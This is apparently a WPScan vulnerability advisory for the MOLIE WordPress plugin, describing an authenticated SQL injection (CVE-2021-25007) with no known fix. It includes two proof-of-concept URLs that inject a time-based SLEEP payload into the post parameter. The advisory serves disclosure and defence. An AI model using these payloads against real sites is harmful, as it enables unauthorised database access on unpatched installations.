WordPress Plugin Vulnerabilities

MOLIE <= 0.5 - Authenticated SQL Injection

Description

The plugin does not validate and escape a post parameter before using in a SQL statement, leading to an SQL Injection

Proof of Concept

https://example.com/wp-admin/post.php?post={valid_post_id}+and+SLEEP%285%29&action=edit

https://example.com/wp-admin/admin-post.php?action=edit&post=1+and+SLEEP%285%29

Affects Plugins

molie-instructure-canvas-linking-tool

No known fix - plugin closed

References

CVE

CVE-2021-25007

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Jeremie Amsellem

Submitter

Jeremie Amsellem

Submitter website

https://fenrir.pro

Submitter twitter

lp1dev

Verified

Yes

WPVDB ID

cf907d53-cc4a-4b02-bed3-64754128112c

Timeline

Publicly Published

2021-11-29 (about 7 months ago)

Added

2022-02-15 (about 4 months ago)

Last Updated

2022-04-08 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin